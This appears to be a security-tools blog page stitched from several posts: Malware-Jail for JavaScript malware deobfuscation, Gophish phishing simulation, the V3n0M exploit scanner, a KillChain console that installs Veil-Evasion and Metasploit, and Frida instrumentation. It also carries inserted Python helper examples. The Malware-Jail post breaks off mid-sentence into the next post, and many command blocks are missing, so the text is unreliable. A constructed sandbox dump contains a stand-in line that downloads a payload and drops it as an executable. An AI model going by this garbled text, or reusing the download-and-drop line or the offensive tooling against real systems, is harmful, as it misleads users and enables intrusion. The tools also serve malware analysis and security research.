Malware-Jail – Tool For Javascript Malware Analysis, Deobfuscation and Payload Extraction

Malware-Jail is a sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. It is written for Node.js.

It runs on any operating system. Developed and tested on Linux, Node.js v6.6.0.

Note: Due to use of some ES6 features, you’ll need Node.js >= 6.x.

Malware-Jail is written for Node’s ‘vm’ sandbox. It currently implements the WScript (Windows Scripting Host) context in env/wscript.js, at least the part frequently used by malware. The Internet browser context is partially implemented in env/browser.js.

How To Install Malware-Jail

You’ll need Node.js and npm installed, because malware-jail is built on top of minimist, iconv-lite and entities.

Pull from GitHub

Pull the source with git:

Then install all the dependencies (minimist, entities, iconv-lite) with:

Usage

In the examples folder you may find a deactivated malware file. Run the analysis with:

Internet browser based malware you may test with

At the end of the analysis the complete sandbox context is dumped into a sandbox_dump_after.json file.

You may want to examine the following entries of sandbox_dump_after.json:

  • eval_calls – array of all eval() call arguments. Useful if eval() is used for deobfuscation.
  • wscript_saved_files – content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.
  • wscript_urls – all URLs that the malware intended to GET or POST.
  • wscript_objects – WScript or ActiveX objects created.

sandbox_dump_after.json uses JSONPath, as implemented by JSON-js/cycle.js, to represent duplicated or cyclic references to the same object.
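To work with such a dump from a script, here is an added Python example (not part of malware-jail) that resolves the cycle.js "$ref" markers back into the objects they point at and then pulls out the four entries listed above. The embedded dump is constructed to have that shape and is not real sandbox output:

```python
"""Read a malware-jail sandbox_dump_after.json, resolve the JSON-js/cycle.js
"$ref" markers and pull out the entries worth examining.
Added example, not part of malware-jail."""
import json
import re

# Constructed dump in the shape described above (not real sandbox output).
# The dropped stage2.js is a cycle.js reference back to the second eval()
# argument, and "self" points back at the root, so the dump is cyclic.
SAMPLE_DUMP = r'''
{
  "eval_calls": [
    "var u = 'http://example.invalid/payload.bin'; var f = '%TEMP%\\tmp.exe';",
    "var x = new ActiveXObject('MSXML2.XMLHTTP'); x.open('GET', u, false); x.send();"
  ],
  "wscript_urls": [
    {"method": "GET", "url": "http://example.invalid/payload.bin"}
  ],
  "wscript_saved_files": {
    "%TEMP%\\tmp.exe": "MZ...constructed payload bytes...",
    "%TEMP%\\stage2.js": {"$ref": "$[\"eval_calls\"][1]"}
  },
  "wscript_objects": ["WScript.Shell", "MSXML2.XMLHTTP", "ADODB.Stream"],
  "self": {"$ref": "$"}
}
'''

# cycle.js paths look like $["eval_calls"][1]: a "$" root followed by
# bracketed JSON string keys or integer indices.
_PATH_TOKEN = re.compile(r'\[(\d+|"(?:[^"\\]|\\.)*")\]')
_URL = re.compile(r"""https?://[^\s'"\\]+""")


def resolve_path(root, path):
    """Follow a cycle.js $ref path from the root object."""
    if not path.startswith("$"):
        raise ValueError("bad $ref path: %r" % path)
    node, pos = root, 1
    while pos < len(path):
        m = _PATH_TOKEN.match(path, pos)
        if m is None:
            raise ValueError("bad $ref path: %r" % path)
        tok = m.group(1)
        node = node[int(tok)] if tok.isdigit() else node[json.loads(tok)]
        pos = m.end()
    return node


def retrocycle(root):
    """Replace every {"$ref": path} marker in place with the object it names.
    Markers are replaced, never descended into, so cycles cannot loop."""
    def is_ref(v):
        return isinstance(v, dict) and len(v) == 1 and isinstance(v.get("$ref"), str)

    def walk(container):
        items = container.items() if isinstance(container, dict) else enumerate(container)
        for key, value in list(items):
            if is_ref(value):
                container[key] = resolve_path(root, value["$ref"])
            elif isinstance(value, (dict, list)):
                walk(value)

    walk(root)
    return root


def load_dump(text):
    return retrocycle(json.loads(text))


def summarize(dump):
    """The four entries the README points at, in a compact form."""
    urls = dump.get("wscript_urls", [])
    files = dump.get("wscript_saved_files", {})
    return {
        "eval_calls": len(dump.get("eval_calls", [])),
        "urls": [u["url"] if isinstance(u, dict) else u for u in urls],
        "dropped_files": {name: len(body) for name, body in files.items()},
        "objects": list(dump.get("wscript_objects", [])),
    }


def urls_in_eval_calls(dump):
    """URLs embedded in eval() arguments, which may include ones the sandbox
    never actually requested (e.g. because a branch was not taken)."""
    seen = []
    for code in dump.get("eval_calls", []):
        for url in _URL.findall(code):
            if url not in seen:
                seen.append(url)
    return seen


if __name__ == "__main__":
    dump = load_dump(SAMPLE_DUMP)
    print(json.dumps(summarize(dump), indent=2))
    print("URLs seen in eval() arguments:", urls_in_eval_calls(dump))
```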

Sample Output

In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Examples

The malware folder contains real-world malware samples. Most of them were downloaded from https://malwr.com.

Example: Analysing Wileen.js

Taking the malicious script from malwr.com: Wileen.js
Apparently the malware does not execute if run from within a browser:

Therefore you may want to use an alternate config file which does not load the browser/DOM components:

Interesting use of Powershell:

Example: Analysing ORDER-10455.js

Taking malicious JavaScript from malwr.com: ORDER-10455.js

First run without interaction with remote servers:

you get something like:

This seems to be the “standard” behaviour: deobfuscate, then download an exe binary and execute it.

If we want to get the real payload, run it with --down=y:

Example: Analysing Norri.js

Taking malicious JavaScript from malwr.com: Norri.js

Run:

you get: 

Behaviour is obvious from the log. Payload has been extracted into the output/TemporaryFolder_TempFile[15] file.

Example: Analysing Angler EK

Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler/angler_full.html.

Strip the non Angler part and save as malware/angler/angler_stripped.html.

Remove 

Gophish – An Open-Source Phishing Toolkit

Gophish is a powerful, open-source phishing framework that makes the simulation of real-world phishing attacks dead-simple.

The idea behind gophish is simple – make industry-grade phishing training available to everyone. “Available” in this case means two things:

  • Affordable – Gophish is open-source software that is completely free for anyone to use.
  • Accessible – Gophish is written in the Go programming language. This has the benefit that gophish releases are compiled binaries with no dependencies. In a nutshell, this makes installation as simple as “download and run”!

How To Install Gophish

Gophish is provided as a pre-built binary for most operating systems. With this being the case, installation is as simple as downloading the ZIP file containing the binary that is built for your OS and extracting the contents.

Building Gophish from Source

Since Gophish is written in the Go programming language, it is extremely simple to build from source. All you will need is the Go language and a C compiler (such as gcc).

To build gophish from source, simply run go get github.com/gophish/gophish. This downloads gophish into your $GOPATH.

Next, navigate to $GOPATH/src/github.com/gophish/gophish and run the command go build. This builds a gophish binary in the current directory.

Understanding the config.json

There are some settings that are configurable via a file called config.json, located in the gophish root directory. Here are some of the options that you can set to your preferences:

Be careful: Since the config.json file contains database credentials, you will want to ensure it is only readable by the correct user. For Linux users, you can do this using chmod 640 config.json.

Exposing Gophish to the Internet

By default, the phish_server.listen_url is configured to listen on all interfaces. This means that if the host Gophish is running on is exposed to the Internet (such as running on a VPS), the phishing server will be exposed to the Internet.

If you also want the admin server to be accessible over the Internet, you will need to change the entry for the admin_server.listen_url to 0.0.0.0:3333.

Be careful: Exposing the admin server to the Internet should only be used if needed. Before exposing the admin server to the Internet, it’s highly recommended to change the default password.

Using MySQL

The default database in Gophish is SQLite. This is perfectly functional, but some environments may benefit from leveraging a more robust database such as MySQL.

Support for MySQL has been added as of 0.3-dev. To set up Gophish for MySQL, a couple of extra steps are needed.

Update config.json:

First, change the entries in config.json to match your deployment:

Example:

The format for the db_path entry is

Update MySQL Config:

Gophish uses a datetime format that is incompatible with MySQL >= 5.7. To fix this, add the following lines to the bottom of /etc/mysql/mysql.cnf:

The above settings are the default modes for MySQL, but with NO_ZERO_IN_DATE and NO_ZERO_DATE removed.

Create the Database:

The last step you’ll need to do to leverage MySQL is to create the gophish database. To do this, log into mysql and run the command

After that, you’ll be good to go!

Now that you have gophish installed, you’re ready to run the software. To launch gophish, simply open a command shell and navigate to the directory the gophish binary is located.

Then, execute the gophish binary. You will see some informational output showing both the admin and phishing web servers starting up, as well as the database being created. This output will tell you the port numbers you can use to connect to the web interfaces.

To run Gophish as a service in Linux distributions, you will need to setup a service script. You can refer to this Github issue for an example implementation.

If your phishing server is set to run on TCP port 80, then you may need to run Gophish as an administrator so that it can bind to the privileged port.

to reach the login page.


Arpy – Mac OSX ARP Spoof (MiTM) Tool


V3n0M – An Open Source Vulnerability Scanner

V3n0M is a free and open source scanner. Evolved from Baltazar’s scanner, it has adopted several new features that improve functionality and usability.

This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds.

It is very useful for executing:

  • Cloudflare Resolver[Cloudbuster]
  • LFI->RCE and XSS Scanning[LFI->RCE & XSS]
  • SQL Injection Vuln Scanner[SQLi]
  • Extremely Large D0rk Target Lists
  • AdminPage Finding
  • Toxin [Vulnerable FTPs Scanner]
  • DNS BruteForcer
  • Python 3.6 Asyncio based scanning

It is the official successor to darkd0rker, heavily recoded, updated, expanded and improved upon.

  • Brand new, just outta the box!
  • Most efficient Cloudflare resolver around with easy to use interface.
  • Extremely quick “Toxin” Vulnerable IP scanner to scan potentially millions of IPs for known vulnerable services.
  • Largest and most powerful d0rker online, 14k+d0rks searched over ~ Engines at once.
  • Free and Open /src/
  • cross-platform Python-based toolkit
  • Release 425 Released on 18th February 2018
  • Licensed under GPLv3

Tested on: ArchLinux 4.14, Ubuntu, Debian, Kali, MacOS, BlackArch, Manjaro/ArchLinux ARM Ed. Android-Termux.

Note for Ubuntu users: Please make sure you have installed the following: sudo apt-get install python3-bs4 and apt-get install python3-setuptools. Otherwise you may get a Syntax Error stopping the program from running.

Note for Kali users: Please make sure you have installed the following: apt-get install python3-dev and apt-get install python-dev

Install Note:

$ git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner.git
$ cd V3n0M-Scanner/
$ python3 setup.py install --user


KillChain – A Unified Console To Perform The “Kill Chain” Stages of Attacks

Kill Chain Setup:

Installing Killchain.py:

sudo apt-get update
sudo apt-get install websploit openvas veil-evasion tor
sudo git clone https://github.com/ruped24/killchain.git
cd killchain
chmod +x killchain.py
sudo ./killchain.py

Once the installation is complete:
Go through the options on the menu:

OpenVas takes a while on first run. Go get a coffee or two. You can launch multiple Kill Chain sessions. No need to watch paint dry. Once the OpenVas setup has completed, reset the openvas web interface admin password by running the commands below in an external terminal.

sudo openvas-start
sudo openvasmd --user=admin --new-password=

Point your browser to https://localhost:9392

Login Username = admin

Login Password = Your_new_reset_admin_password

Note on Veil-Evasion: Veil will complete the setup upon launch. Accept all the defaults. This takes a while. Don't leave the screen though, there's a dialog you will have to click through. Once it’s complete, it will auto launch.

Websploit: To exit websploit, type exit.

Metasploit: To exit Metasploit, type exit.

WiFite: It’s for site survey within the framework of this console.

Run wifite in an external terminal to do wireless attacks against the target.


Frida – Dynamic Instrumentation Toolkit for Developers, Reverse-Engineers, and Security Researchers

Frida is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.


It is

  • Scriptable: It lets you inject your own scripts into black box processes. Hook any function, spy on crypto APIs or trace private application code, no source code needed. Edit, hit save, and instantly see the results. All without compilation steps or program restarts. 
  • Portable: Works on Windows, macOS, GNU/Linux, iOS, Android, and QNX. Install the Node.js bindings from npm, grab a Python package from PyPI, or use Frida through its Swift bindings, .NET bindings, Qt/Qml bindings, or C API. 
  • Free: Frida is free software.
  • Battle-tested: It is very popular among security researchers and pentesters.

Frida also provides you some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.

Why You Need Frida In Your Arsenal (Here are some use-cases):

  • There’s this new hot app everybody’s so excited about, but it’s only available for iOS and you’d love to interop with it. You realize it’s relying on encrypted network protocols and tools like Wireshark just won’t cut it. You pick up Frida and use it for API tracing.
  • You’re building a desktop app which has been deployed at a customer’s site. There’s a problem but the built-in logging code just isn’t enough. You need to send your customer a custom build with lots of expensive logging code. Then you realize you could just use Frida and build an application-specific tool that will add all the diagnostics you need, and in just a few lines of Python. No need to send the customer a new custom build – you just send the tool which will work on many versions of your app.
  • You’d like to build a Wireshark on steroids with support for sniffing encrypted protocols. It could even manipulate function calls to fake network conditions that would otherwise require you to set up a test lab.
  • Your in-house app could use some black-box tests without polluting your production code with logic only required for exotic testing.

Tools:

  • Frida CLI: Frida CLI is a REPL interface that aims to emulate a lot of the nice features of IPython (or Cycript), which tries to get you closer to your code for rapid prototyping and easy debugging.
# Connect Frida to an iPad over USB and start debugging Safari
$ frida -U Safari
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

[USB::iPad 4::Safari]->

An example session:

# Connect Frida to a locally-running Calculator.app
$ frida Calculator
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

# Look at the local variables/context
[Local::ProcName::Calculator]-> 
Backtracer           Process
CpuContext           Proxy
Dalvik               Socket
DebugSymbol          Stalker
File                 Thread
Frida                WeakRef
Instruction          clearInterval
Interceptor          clearTimeout
Memory               console
MemoryAccessMonitor  gc
Module               ptr
NULL                 recv
NativeCallback       send
NativeFunction       setInterval
NativePointer        setTimeout
ObjC
# Look at things exposed through the ObjC interface
[Local::ProcName::Calculator]-> ObjC.
Object            implement         selector
available         mainQueue         selectorAsString
classes           schedule
# List the first 10 classes (there are a lot of them!)
[Local::...::Calculator]-> Object.keys(ObjC.classes).slice(0, 10)
[
    "NSDrawer",
    "GEOPDETAFilter",
    "NSDeserializer",
    "CBMutableCharacteristic",
    "NSOrthographyCheckingResult",
    "DDVariable",
    "GEOVoltaireLocationShiftProvider",
    "LSDocumentProxy",
    "NSPreferencesModule",
    "CIQRCodeGenerator"
]



Loading a script:

# Connect Frida to a locally-running Calculator.app and load calc.js
$ frida Calculator -l calc.js
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

# The code in calc.js has now been loaded and executed
[Local::ProcName::Calculator]->
# Reload it from file at any time
[Local::ProcName::Calculator]-> %reload
[Local::ProcName::Calculator]->

Enable the Node.js compatible debugger:

# Connect Frida to a locally-running Calculator.app
# and load calc.js with the debugger enabled
$ frida Calculator -l calc.js --debug
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

Debugger listening on port 5858
# We can now run node-inspector and start debugging calc.js
[Local::ProcName::Calculator]->

  • frida-ps: This is a command-line tool for listing processes, which is very useful when interacting with a remote system. (You can acquire device id from frida-ls-devices tool)
# Connect Frida to an iPad over USB and list running processes
$ frida-ps -U

# List running applications
$ frida-ps -Ua

# List installed applications
$ frida-ps -Uai

# Connect Frida to the specific device
$ frida-ps -D 0216027d1d6d3a03

  • frida-trace: frida-trace is a tool for dynamically tracing function calls.
# Trace recv* and send* APIs in Safari, insert library names
# in logging
$ frida-trace --decorate -i "recv*" -i "send*" Safari

# Trace ObjC method calls in Safari
$ frida-trace -m "-[NSView drawRect:]" Safari

# Launch SnapChat on your iPhone and trace crypto API calls
$ frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"

# Trace all JNI functions in Samsung FaceService app on Android
$ frida-trace -U -i "Java_*" com.samsung.faceservice

# Trace a Windows process's calls to "mem*" functions in msvcrt.dll
$ frida-trace -p 1372 -i "msvcrt.dll!*mem*"

# Trace all functions matching "*open*" in the process except
# in msvcrt.dll
$ frida-trace -p 1372 -i "*open*" -x "msvcrt.dll!*open*"

# Trace an unexported function in libjpeg.so
$ frida-trace -p 1372 -a "libjpeg.so!0x4793c"

Full List of Options:

--version             show program's version number and exit
-h, --help            show this help message and exit
-D ID, --device=ID    connect to device with the given ID
-U, --usb             connect to USB device
-R, --remote          connect to remote frida-server
-H HOST, --host=HOST  connect to remote frida-server on HOST
-f FILE, --file=FILE  spawn FILE
-F, --attach-frontmost
                      attach to frontmost application
-n NAME, --attach-name=NAME
                      attach to NAME
-p PID, --attach-pid=PID
                      attach to PID
--stdio=inherit|pipe  stdio behavior when spawning (defaults to "inherit")
--runtime=duk|v8      script runtime to use (defaults to "duk")
--debug               enable the Node.js compatible script debugger
-I MODULE, --include-module=MODULE
                      include MODULE
-X MODULE, --exclude-module=MODULE
                      exclude MODULE
-i FUNCTION, --include=FUNCTION
                      include FUNCTION
-x FUNCTION, --exclude=FUNCTION
                      exclude FUNCTION
-a MODULE!OFFSET, --add=MODULE!OFFSET
                      add MODULE!OFFSET
-T, --include-imports
                      include program's imports
-t MODULE, --include-module-imports=MODULE
                      include MODULE imports
-m OBJC_METHOD, --include-objc-method=OBJC_METHOD
                      include OBJC_METHOD
-M OBJC_METHOD, --exclude-objc-method=OBJC_METHOD
                      exclude OBJC_METHOD
-s DEBUG_SYMBOL, --include-debug-symbol=DEBUG_SYMBOL
                      include DEBUG_SYMBOL
-q, --quiet           do not format output messages
-d, --decorate        Add module name to generated onEnter log statement
-o OUTPUT, --output=OUTPUT
                      dump messages to file

-U, --usb: connect to USB device:
This option tells frida-trace to perform tracing on a remote device connected via the host machine’s USB connection. Example: You want to trace an application running on an Android device from your host Windows machine. If you specify -U / --usb, frida-trace will perform the necessary work to transfer all data to and from the remote device and trace accordingly.

Note: When tracing a remote device, remember to copy the platform-appropriate frida-server binary to the remote device. Once copied, be sure to run the frida-server binary before beginning the tracing session. For example, to trace a remote Android application, you would copy the frida-server-12.8.0-android-arm binary to the Android device’s /data/local/tmp folder. Using adb shell, you would run the server in the background (e.g. frida-server-12.8.0-android-arm &).

-I, -X: include/exclude module:
These options allow you to include or exclude all functions in a particular module (e.g., *.so, *.dll) in one, single option. The option expects a filename glob for matching one or more modules. Any module that matches the glob pattern will be either included or excluded in its entirety.

frida-trace will generate a JavaScript handler file for each function matched by the -I option.

To exclude specific functions after including an entire module, see the -i option.

-i, -x: include/exclude function (glob-based):
These options enable you to include or exclude matching functions according to your needs. This is a flexible option, allowing a granularity ranging from all functions in all modules down to a single function in a specific module.

frida-trace will generate a JavaScript handler file for each function matched by the -i option.

The -i / -x options differ syntactically from their uppercase counterparts in that they accept any of the following forms (MODULE and FUNCTION are both glob patterns):

  • MODULE!FUNCTION
  • FUNCTION
  • !FUNCTION
  • MODULE!

Here are some examples and their descriptions:

-i "msvcrt.dll!*cpy*"   Matches all functions with 'cpy' in their name, ONLY in msvcrt.dll
-i "*free*"             Matches all functions with 'free' in their name in ALL modules
-i "!*free*"            Identical to -i "*free*"
-i "gdi32.dll!"         Trace all functions in gdi32.dll

frida-trace has an internal concept of a “working set”, i.e., a set of “module:function” pairs whose handlers will be traced at runtime. The contents of the working set can be changed by an include / exclude command line option (-I / -X / -i / -x).

It is important to understand that the order of the include / exclude options is important. Each such option works on the current state of the working set, and different orderings of options can lead to different results. In other words, the include/exclude options are procedural (i.e., order counts) rather than simply declarative.

For example, suppose we want to trace all “str*” and “mem*” functions in all modules in a running process. In our example, these functions are found in three modules: ucrtbase.dll, ntdll.dll, and msvcrt.dll. To reduce the noise, however, we do not want to trace any functions found in the msvcrt.dll module.

We will describe three different option orders on the command line and show that they produce different results.

  • -i "str*" -i "mem*" -X "msvcrt.dll"
    • -i "str*" matches 80 functions in 3 modules, working set has 80 entries
    • -i "mem*" matches 18 functions in 3 modules, working set has 98 entries
    • -X "msvcrt.dll" removes the 28 "str" and 6 "mem" functions originating in msvcrt.dll, final working set has 64 entries.
  • -i "str*" -X "msvcrt.dll" -i "mem*"
    • -i "str*" matches 80 functions in 3 modules, working set has 80 entries
    • -X "msvcrt.dll" removes the 28 "str" functions originating in msvcrt.dll, working set has 52 entries.
    • -i "mem*" matches 18 functions in 3 modules including msvcrt.dll, final working set has 70 entries
  • -X "msvcrt.dll" -i "str*" -i "mem*"
    • -X "msvcrt.dll" tries to remove the 28 "str" and 6 "mem" functions originating in msvcrt.dll. Since the working set is empty, there is nothing to remove, working set has 0 entries.
    • -i "str*" matches 80 functions in 3 modules, working set has 80 entries
    • -i "mem*" matches 18 functions in 3 modules, final working set has 98 entries
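Here is an added Python model of that procedural working set (an illustration, not frida-tools’ own code). The export table is constructed so that the counts match the three orderings above; the function names are synthetic and the option semantics follow the four -i/-x forms and the -I/-X module globs described in this section:

```python
"""Model of frida-trace's procedural include/exclude working set.
Added illustration, not frida-tools' own code."""
from fnmatch import fnmatchcase


def _synthetic(prefix, n):
    # Constructed export names such as str00, str01, ... (not real exports).
    return ["%s%02d" % (prefix, i) for i in range(n)]


# Constructed export table: 80 "str*" and 18 "mem*" functions across three
# modules, 28 "str" and 6 "mem" of them in msvcrt.dll, as in the text above.
MODULES = {
    "msvcrt.dll":   _synthetic("str", 28) + _synthetic("mem", 6) + ["fopen", "free"],
    "ucrtbase.dll": _synthetic("str", 26) + _synthetic("mem", 6) + ["fopen"],
    "ntdll.dll":    _synthetic("str", 26) + _synthetic("mem", 6) + ["NtClose"],
}


def split_spec(spec):
    """Split an -i/-x value into (module glob, function glob).
    Accepts the MODULE!FUNCTION, FUNCTION, !FUNCTION and MODULE! forms."""
    if "!" in spec:
        module, function = spec.split("!", 1)
        return module or "*", function or "*"
    return "*", spec


def select(spec, modules=MODULES):
    """All (module, function) pairs matched by an -i/-x style spec."""
    mod_glob, fn_glob = split_spec(spec)
    return {(m, f)
            for m, fns in modules.items() if fnmatchcase(m, mod_glob)
            for f in fns if fnmatchcase(f, fn_glob)}


# Option -> (adds to the working set?, how to turn the value into a spec).
# -I/-X take a module glob, i.e. the MODULE! form; -i/-x take a function spec.
_OPTIONS = {
    "-I": (True,  lambda v: v + "!"),
    "-X": (False, lambda v: v + "!"),
    "-i": (True,  lambda v: v),
    "-x": (False, lambda v: v),
}


def apply_options(argv, modules=MODULES):
    """Replay -I/-X/-i/-x in command-line order and return the final working
    set. Each option acts on the set as it stands, so order matters."""
    working = set()
    args = iter(argv)
    for opt in args:
        if opt not in _OPTIONS:
            raise ValueError("unsupported option: %s" % opt)
        include, to_spec = _OPTIONS[opt]
        matched = select(to_spec(next(args)), modules)
        working = working | matched if include else working - matched
    return working


def trace_steps(argv, modules=MODULES):
    """Working-set size after each option, for explaining an ordering."""
    return [len(apply_options(argv[:i], modules))
            for i in range(2, len(argv) + 1, 2)]


if __name__ == "__main__":
    for order in (["-i", "str*", "-i", "mem*", "-X", "msvcrt.dll"],
                  ["-i", "str*", "-X", "msvcrt.dll", "-i", "mem*"],
                  ["-X", "msvcrt.dll", "-i", "str*", "-i", "mem*"]):
        print(" ".join(order), "->", trace_steps(order))
```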

-a: include function (offset-based):

This option enables tracing functions whose names are not exported by their modules (e.g., a static C/C++ function). This should not prevent you from tracing such functions, so long as you know the absolute offset of the function’s entry point.

Example: -a “libjpeg.so!0x4793c”

The option value provides both the full name of the module and the hex offset of the function entry point within the module.

frida-trace will generate a JavaScript handler file for each function matched by the -a option.

-d, --decorate: add module name to log tracing:

The --decorate option is relevant when frida-trace auto-generates JavaScript handler scripts. By default, a handler’s onEnter function looks like this:

onEnter: function (log, args, state) {
  log('memcpy()');
},

The drawback is that, if the same function name exists in multiple modules, it will be difficult to differentiate between function traces. The --decorate option instructs frida-trace to insert the module name in the default onEnter trace instruction:

onEnter: function (log, args, state) {
  log('memcpy() [msvcrt.dll]');
},

  • frida-discover: frida-discover is a tool for discovering internal functions in a program, which can then be traced by using frida-trace.
  • frida-ls-devices: This is a command-line tool for listing attached devices, which is very useful when interacting with multiple devices.
# List all devices Frida can see, including the ones attached over USB
$ frida-ls-devices

# example output

Id                                        Type    Name            
----------------------------------------  ------  ----------------
local                                     local   Local System    
0216027d1d6d3a03                          tether  Samsung SM-G920F
1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e  tether  iOS Device      
tcp                                       remote  Local TCP  

  • frida-kill: This is a command-line tool for killing processes. You can acquire PIDs from frida-ps tool.
$ frida-kill -D  
# List active applications
$ frida-ps -D 1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e  -a

PID  Name                Identifier                                           
----  ------------------  -----------------------------------------------------
4433  Camera              com.apple.camera                                     
4001  Cydia               com.saurik.Cydia                                     
4997  Filza               com.tigisoftware.Filza                               
4130  IPA Installer       com.slugrail.ipainstaller                            
3992  Mail                com.apple.mobilemail                                 
4888  Maps                com.apple.Maps                                       
6494  Messages            com.apple.MobileSMS                                                          
5029  Safari              com.apple.mobilesafari                               
4121  Settings            com.apple.Preferences  

# Connect Frida to the device and kill running process
$ frida-kill -D 1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e 5029

# Check if process has been killed
$ frida-ps -D 1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e  -a

PID  Name                Identifier                                           
----  ------------------  -----------------------------------------------------
4433  Camera              com.apple.camera                                     
4001  Cydia               com.saurik.Cydia                                     
4997  Filza               com.tigisoftware.Filza                               
4130  IPA Installer       com.slugrail.ipainstaller                            
3992  Mail                com.apple.mobilemail                                 
4888  Maps                com.apple.Maps                                       
6494  Messages            com.apple.MobileSMS                                                          
4121  Settings            com.apple.Preferences

How To Install Frida

Requirements for Frida’s CLI tools:

  • Python – latest 3.x is highly recommended
  • Windows, macOS, or GNU/Linux

Install with pip:

The best way to install Frida’s CLI tools is via PyPI:

$ pip install frida-tools

Install manually:
Download the binaries and install them.

Testing Your Installation

Start a process we can inject into:

$ cat

Just let it sit and wait for input. On Windows you might want to use notepad.exe.

Note that this example won’t work on macOS El Capitan and later, as it rejects such attempts for system binaries. However, if you copy the cat binary to e.g., /tmp/cat then run that instead the example should work:

$ cp /bin/cat /tmp/cat
$ /tmp/cat

In another terminal, make a file example.py with the following contents:

import frida

def on_message(message, data):
    # Called for every message the injected script sends back (send(), errors, ...)
    print("[on_message] message:", message, "data:", data)

# Attach to the already running process by name
session = frida.attach("cat")

# Inject a script that exposes a single RPC export to the host side
script = session.create_script("""
rpc.exports.enumerateModules = function () {
  return Process.enumerateModules();
};
""")
script.on("message", on_message)
script.load()

# Call the export; the camelCase JS name is exposed as snake_case in Python
print([m["name"] for m in script.exports.enumerate_modules()])

If you are on GNU/Linux, issue:

$ sudo sysctl kernel.yama.ptrace_scope=0

to enable ptracing non-child processes.

At this point, we are ready to take Frida for a spin! Run the example.py script and watch the magic:

$ python example.py

The output should be something similar to this (depending on your platform and library versions):

[u'cat', …, u'ld-2.15.so']

Modes of Operation

Frida provides dynamic instrumentation through its powerful instrumentation core Gum, which is written in C. Because such instrumentation logic is prone to change, you usually want to write it in a scripting language so you get a short feedback loop while developing and maintaining it. This is where GumJS comes into play. With just a few lines of C you can run a piece of JavaScript inside a runtime that has full access to Gum’s APIs, allowing you to hook functions, enumerate loaded libraries, their imported and exported functions, read and write memory, scan memory for patterns, etc.

Most of the time, however, you want to spawn an existing program, attach to a running program, or hijack one as it’s being spawned, and then run your instrumentation logic inside of it. As this is such a common way to use Frida, it is what most of our documentation focuses on. This functionality is provided by frida-core, which acts as a logistics layer: it packages up GumJS into a shared library that it injects into existing software, provides a two-way communication channel for talking to your scripts, and lets you unload them later. Besides this core functionality, frida-core also lets you enumerate installed apps, running processes, and connected devices. The connected devices are typically iOS and Android devices where frida-server is running. That component is essentially just a daemon that exposes frida-core over TCP, listening on localhost:27042 by default.

It is sometimes not possible to use Frida in injected mode, for example on jailed iOS and Android systems. For such cases we provide frida-gadget, a shared library that you embed inside the program that you want to instrument. Simply loading the library allows you to interact with it remotely, using existing Frida-based tools like frida-trace. It also supports a fully autonomous approach where it runs scripts off the filesystem without any outside communication.
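The example.py above only prints whatever arrives on the two-way channel that frida-core provides between the host and the injected script. The following is an added example, not part of the original page or the Frida project, showing how a host-side handler would actually consume that channel: the agent reports each loaded module with send(), the host sorts the collected messages into module records, uncaught agent errors (which Frida delivers with type "error", a description, fileName and lineNumber) and anything else, and summarises them. The agent source, the MessageCollector class and the constructed sample traffic are all assumptions of this example; only run() needs frida installed, and the rest can be exercised offline.

```python
"""Host-side handling of Frida's script-to-host message channel.

Added example (not the page's or Frida's own code). The agent source,
MessageCollector and the constructed SAMPLE_TRAFFIC are assumptions made
for illustration. Only run() requires the frida package.
"""
import json

# JavaScript run inside the target by GumJS. It uses the page's rpc.exports
# pattern plus send(), which delivers a one-way message to the host.
AGENT_SOURCE = """
rpc.exports = {
  enumerateModules: function () {
    var modules = Process.enumerateModules();
    modules.forEach(function (m) {
      send({ event: 'module', name: m.name, base: m.base.toString(), size: m.size });
    });
    return modules.length;
  }
};
"""


class MessageCollector:
    """Sorts incoming messages into module records, agent errors and the rest."""

    def __init__(self):
        self.modules = []  # {"name", "base", "size"} dicts from the agent
        self.errors = []   # (description, fileName, lineNumber) of agent errors
        self.other = []    # (payload, data) pairs we did not recognise

    def on_message(self, message, data):
        # Frida hands the host {'type': 'send', 'payload': ...} for send()
        # and {'type': 'error', 'description': ..., 'stack': ..., 'fileName': ...,
        # 'lineNumber': ..., 'columnNumber': ...} for uncaught script errors.
        kind = message.get("type")
        if kind == "send":
            payload = message.get("payload")
            if isinstance(payload, dict) and payload.get("event") == "module":
                self.modules.append({
                    "name": payload["name"],
                    "base": payload["base"],
                    "size": int(payload["size"]),
                })
            else:
                self.other.append((payload, data))
        elif kind == "error":
            self.errors.append((message.get("description"),
                                message.get("fileName"),
                                message.get("lineNumber")))
        else:
            self.other.append((message, data))

    def summary(self):
        """Module names by descending size plus how many agent errors occurred."""
        ranked = sorted(self.modules, key=lambda m: m["size"], reverse=True)
        return {
            "module_count": len(self.modules),
            "largest_first": [m["name"] for m in ranked],
            "error_count": len(self.errors),
        }


# Constructed sample traffic in the exact shape frida-python passes to the
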